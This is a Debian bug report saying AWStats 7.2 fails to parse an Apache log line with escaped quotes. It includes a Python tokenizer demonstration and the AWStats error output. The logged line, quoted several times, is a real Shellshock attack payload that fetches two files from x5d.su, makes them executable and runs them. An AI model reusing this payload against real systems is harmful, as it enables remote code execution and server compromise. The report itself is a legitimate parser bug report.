Package: awstats
Version: 7.2+dfsg-1
Severity: normal

AWstats in jessie gets distracted by the following line in an Apache log:

staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET 
/cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php 
-r '$a = \"http://x5d.su/s/susu1\";;''$b = \"http://x5d.su/s/susu2\";;''$c = 
sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g 
= \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = 
\"fopen\";''if ($i($c . 
\"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", 
\"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c 
.\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . 
\"/$e\");''}'" "-"

The issue, obviously, is the Referrer, which someone tried to leverage
to exploit the webserver, or PHP.

Unfortunately, the line breaks awstats, and is effectively a DoS against
AWstats.

While breaking AWstats will, in practice, probably cause no real harm,
it's still broken by valid input (the above posted line *is* valid
input…), so I am reporting this as critical.

I think the cause of the issue is AWstats not expecting escaped quotes
in the string and mistaking them for ending quotes of the Referrer.
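To check that hypothesis without touching AWStats itself, here is a small added example (not part of this report and not AWStats code) that tokenizes a line in the LogFormat shown below with two regular expressions: a naive one that treats a quoted field as "anything up to the next quote", and an escape-aware one that accepts Apache's backslash escapes (\" and \\, plus \xHH for non-printable bytes). The sample line is the report's own line with the referer shortened to a few of its statements; the field names and the helper names are my own choice.

```python
"""Tokenize Apache vhost_combined log lines whose quoted fields contain
backslash-escaped quotes.  Demonstrates why a naive "up to the next quote"
tokenizer rejects the line from the report while an escape-aware one does not.
Added example; not AWStats code."""
import re

# Fields of the LogFormat reported by AWStats (field names are my own):
#   %virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot
FIELDS = ("vhost", "host", "other", "logname", "time",
          "request", "code", "bytes", "referer", "user_agent")

# Naive quoted field: no quote may appear inside it.  This is the assumption
# the report blames: an escaped \" is mistaken for the closing quote.
_NAIVE_QUOTED = r'"([^"]*)"'

# Escape-aware quoted field: either a character that is neither a quote nor a
# backslash, or a backslash followed by any single character.
_ROBUST_QUOTED = r'"((?:[^"\\]|\\.)*)"'

def _line_re(quoted):
    return re.compile(
        r'^(\S+) (\S+) (\S+) (\S+) \[([^\]]+)\] ' + quoted +
        r' (\d{3}) (\S+) ' + quoted + ' ' + quoted + '$')

_NAIVE = _line_re(_NAIVE_QUOTED)
_ROBUST = _line_re(_ROBUST_QUOTED)

_SIMPLE_ESCAPES = {'"': '"', '\\': '\\', 'n': '\n', 't': '\t', 'r': '\r'}

def unescape_apache(s):
    """Undo the escaping Apache applies to logged header values."""
    out, i = [], 0
    while i < len(s):
        c = s[i]
        if c == '\\' and i + 1 < len(s):
            nxt = s[i + 1]
            if nxt in _SIMPLE_ESCAPES:
                out.append(_SIMPLE_ESCAPES[nxt])
                i += 2
                continue
            if nxt == 'x' and i + 3 < len(s):          # \xHH
                try:
                    out.append(chr(int(s[i + 2:i + 4], 16)))
                    i += 4
                    continue
                except ValueError:
                    pass                                # not hex: keep literally
        out.append(c)
        i += 1
    return ''.join(out)

def parse_naive(line):
    """Return a field dict, or None when the naive tokenizer rejects the line."""
    m = _NAIVE.match(line)
    return dict(zip(FIELDS, m.groups())) if m else None

def parse_robust(line):
    """Return a field dict with quoted fields unescaped, or None on no match."""
    m = _ROBUST.match(line)
    if not m:
        return None
    rec = dict(zip(FIELDS, m.groups()))
    for key in ("request", "referer", "user_agent"):
        rec[key] = unescape_apache(rec[key])
    return rec

# The report's line, with the referer cut down to a few statements (constructed
# shortening of the real line; the escaped quotes that matter are kept).
SAMPLE_LINE = (
    r'''staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] '''
    r'''"GET /cgi-bin/status/status.cgi HTTP/1.0" 404 488 '''
    r'''"() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";;''$h = \"system\";'" "-"'''
)

# A constructed ordinary line on which both tokenizers must agree.
NORMAL_LINE = ('www.example.org:80 192.0.2.10 - - [04/Mar/2017:23:31:00 +0100] '
               '"GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"')

if __name__ == "__main__":
    for line in (NORMAL_LINE, SAMPLE_LINE):
        print("naive :", "rejected" if parse_naive(line) is None else "ok")
        rec = parse_robust(line)
        print("robust:", "rejected" if rec is None else rec["referer"])
```

Running the block shows the naive tokenizer rejecting the report's line and accepting the ordinary one, while the escape-aware tokenizer accepts both and yields the referer with its quotes restored. To run it over a real log, iterate over the file with `parse_robust` and count the lines it returns None for; on a log AWStats already handles that count should be zero.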

Here's awstats' output hitting this line:

Error while processing /etc/awstats/awstats.www.teckids.org.conf
Create/Update database for config "/etc/awstats/awstats.www.teckids.org.conf" 
by AWStats version 7.2 (build 1.992)
From data in log file "/var/log/apache2/other_vhosts_access.log"...
Phase 1 : First bypass old records, searching new record...
Direct access after last parsed record (after line 7548)
AWStats did not find any valid log lines that match your LogFormat parameter, 
in the 50th first non commented lines read of your log.
Your log file /var/log/apache2/other_vhosts_access.log must have a bad format 
or LogFormat parameter setup does not match this format.
Your AWStats LogFormat parameter is:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
This means each line in your web server log file need to have the following 
personalized log format:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
And this is an example of records AWStats found in your log file (the record 
number 50 in your log):
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET 
/cgi-bin/admin.html HTTP/1.0" 404 481 "() { :;} ;echo;/usr/local/bin/php -r '$a 
= \"http://x5d.su/s/susu1\";;''$b = \"http://x5d.su/s/susu2\";;''$c = 
sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g 
= \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = 
\"fopen\";''if ($i($c . 
\"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", 
\"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c 
.\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . 
\"/$e\");''}'" "-"
Setup ('/etc/awstats/awstats.www.teckids.org.conf' file, web server or 
permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
Error while processing /etc/awstats/awstats.conf
Create/Update database for config "/etc/awstats/awstats.conf" by AWStats 
version 7.2 (build 1.992)
From data in log file "/var/log/apache2/other_vhosts_access.log"...
Phase 1 : First bypass old records, searching new record...
Direct access after last parsed record (after line 7554)
AWStats did not find any valid log lines that match your LogFormat parameter, 
in the 50th first non commented lines read of your log.
Your log file /var/log/apache2/other_vhosts_access.log must have a bad format 
or LogFormat parameter setup does not match this format.
Your AWStats LogFormat parameter is:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
This means each line in your web server log file need to have the following 
personalized log format:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
And this is an example of records AWStats found in your log file (the record 
number 50 in your log):
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET 
/cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php 
-r '$a = \"http://x5d.su/s/susu1\";;''$b = \"http://x5d.su/s/susu2\";;''$c = 
sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g 
= \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = 
\"fopen\";''if ($i($c . 
\"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", 
\"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c 
.\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . 
\"/$e\");''}'" "-"
Setup ('/etc/awstats/awstats.conf' file, web server or permissions) may be 
wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).

-- System Information:
Debian Release: 8.7
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages awstats depends on:
ii  perl  5.20.2-3+deb8u6

Versions of packages awstats recommends:
ii  coreutils           8.23-4
ii  libnet-xwhois-perl  0.90-4

Versions of packages awstats suggests:
ii  apache2 [httpd]              2.4.10-10+deb8u8
ii  apache2-mpm-prefork [httpd]  2.4.10-10+deb8u8
ii  apache2-mpm-worker [httpd]   2.4.10-10+deb8u8
pn  libgeo-ipfree-perl           <none>
ii  libnet-dns-perl              0.81-2+deb8u1
ii  libnet-ip-perl               1.26-1
ii  liburi-perl                  1.64-1

-- Configuration Files:
/etc/awstats/awstats.conf changed [not included]
/etc/awstats/awstats.conf.local changed [not included]

-- no debconf information
